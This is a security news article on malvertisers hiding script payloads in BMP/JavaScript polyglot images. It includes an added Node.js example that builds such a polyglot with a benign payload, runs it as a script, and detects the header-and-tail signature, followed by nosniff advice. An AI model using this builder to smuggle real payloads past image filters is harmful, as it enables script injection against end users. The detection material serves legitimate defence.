Researchers from DEVCON have observed a group of malvertisers using polyglot images to hide malicious ad payloads.
Why it matters - Attackers hiding payloads inside images with steganography is a familiar technique. Polyglot images are different: a steganographic image is still only an image, and the hidden data has to be extracted and executed by separate code, whereas a polyglot is a single file that is simultaneously a valid image and a valid script, so the browser can execute it directly.
The big picture - The attackers use BMP (.bmp) images in their malvertising campaigns and rewrite the bytes of the file-size field in the BMP header so that, read as text, they form JavaScript characters and a JavaScript parser treats the image as code.
Researchers analyzed a sample and found that the attackers had changed the bytes of the size field to the character codes for /*. This pair of characters opens a JavaScript block comment, so the interpreter ignores everything that follows, including the binary image data, until it reaches a closing */ (/* ignore me */).
“As expected the JavaScript Comment is terminated with */. The attacker then adds the characters = and `. What the attacker has done here is turned the file type BMP into a JavaScript variable and set it to another heavily obfuscated payload,” researchers noted.
The same BMP file can now be loaded by the browser in two different ways: referenced as an image it renders normally, and referenced as a script it executes, with the BM magic bytes at the start of the file serving as the variable name.
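As an added illustration (not code from DEVCON's research or from the article), the following Node.js script builds a small BMP/JavaScript polyglot of the kind described, reads the same bytes first as an image and then as a script, and finishes with a simple signature check. The 2x2 image, the benign payload string and the function names are all constructed for this example.

```javascript
// Added example, not DEVCON's sample. Builds a BMP/JS polyglot: "BM" + "/*" in the
// size field hides the image bytes in a comment; "*/=`...`" after the pixels turns
// the whole file into the statement  BM = `payload`  when loaded as a script.
// Assumes Node.js (Buffer API) and an ASCII payload.

function buildBmp(spoofSizeField) {
  const width = 2, height = 2, bpp = 24;
  const rowSize = Math.ceil((width * bpp) / 32) * 4; // rows padded to 4 bytes -> 8
  const pixelBytes = rowSize * height;               // 16
  const offset = 14 + 40;                            // file header + BITMAPINFOHEADER
  const buf = Buffer.alloc(offset + pixelBytes);
  buf.write('BM', 0, 'latin1');                      // magic, also a valid JS identifier
  if (spoofSizeField) {
    // bfSize normally holds the file size. Writing 0x2F 0x2A ("/*") here makes a
    // JavaScript tokenizer see "BM/*"; the remaining two size bytes stay 0x00.
    // Most BMP decoders ignore bfSize, so the image still renders.
    buf.write('/*', 2, 'latin1');
  } else {
    buf.writeUInt32LE(buf.length, 2);                // honest size for a clean file
  }
  buf.writeUInt32LE(0, 6);          // reserved
  buf.writeUInt32LE(offset, 10);    // bfOffBits
  buf.writeUInt32LE(40, 14);        // biSize
  buf.writeInt32LE(width, 18);
  buf.writeInt32LE(height, 22);
  buf.writeUInt16LE(1, 26);         // planes
  buf.writeUInt16LE(bpp, 28);
  buf.writeUInt32LE(0, 30);         // BI_RGB, uncompressed
  buf.writeUInt32LE(pixelBytes, 34);
  buf.writeInt32LE(2835, 38);       // 72 DPI horizontal
  buf.writeInt32LE(2835, 42);       // 72 DPI vertical
  buf.writeUInt32LE(0, 46);         // colours used
  buf.writeUInt32LE(0, 50);         // important colours
  // Constructed pixels: bottom row first, BGR order, each row padded to 8 bytes.
  Buffer.from([0, 0, 255, 0, 255, 0, 0, 0, 255, 0, 0, 255, 255, 255, 0, 0]).copy(buf, offset);
  return buf;
}

// The payload ends up inside a template literal, so escape what would break it.
function escapeForTemplate(s) {
  return s.replace(/\\/g, '\\\\').replace(/`/g, '\\`').replace(/\$\{/g, '\\${');
}

function buildPolyglot(payload) {
  const image = buildBmp(true);
  // Everything up to the tail lives inside the comment, so it must not contain "*/".
  // (A real attacker would re-encode the pixels until this holds.)
  if (image.indexOf('*/', 0, 'latin1') !== -1) {
    throw new Error('image body would close the comment early');
  }
  const tail = Buffer.from('*/=`' + escapeForTemplate(payload) + '`;', 'latin1');
  return Buffer.concat([image, tail]);
}

// Reading 1: as an image. A decoder only cares about the magic and the DIB header.
function parseBmpHeader(buf) {
  if (buf.toString('latin1', 0, 2) !== 'BM') return null;
  return {
    declaredSize: buf.readUInt32LE(2),
    pixelOffset: buf.readUInt32LE(10),
    width: buf.readInt32LE(18),
    height: buf.readInt32LE(22),
    bitsPerPixel: buf.readUInt16LE(28),
  };
}

// Reading 2: as a script, which is what <script src="ad.bmp"> does when the server
// does not send X-Content-Type-Options: nosniff. Evaluated inside a Function scope
// with a local BM so the assignment does not leak onto the global object.
function runAsScript(buf) {
  const src = buf.toString('latin1');
  return new Function('var BM; ' + src + '; return BM;')();
}

// Detection: the header-and-tail pattern that makes a BMP executable.
function looksLikeBmpJsPolyglot(buf) {
  if (buf.toString('latin1', 0, 4) !== 'BM/*') return false;
  const tail = buf.toString('latin1', Math.max(0, buf.length - 4096));
  return /\*\/\s*=\s*`/.test(tail);
}

module.exports = { buildBmp, buildPolyglot, parseBmpHeader, runAsScript, looksLikeBmpJsPolyglot };
```

The declaredSize field of the polyglot decodes to 0x2A2F, nowhere near the real length; a mismatch between bfSize and the actual file size is a cheap first-pass signal, though some legitimate encoders also write a wrong bfSize, so the signature check above is the stronger test.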
The bottom line - Polyglot files are not new to security researchers: they have long been used to smuggle shellcode and to upload image files that double as server-side scripts.
Similar JS/GIF polyglot images are a known technique for bypassing a site's Content Security Policy to execute XSS: an uploaded image that is also valid JavaScript can be loaded with a script tag from an origin the policy trusts. The novelty here is that ad-fraud actors are adopting the same technique against end users. Hosts that serve uploaded or third-party images should send X-Content-Type-Options: nosniff, which makes browsers refuse to execute a resource with an image MIME type as a script.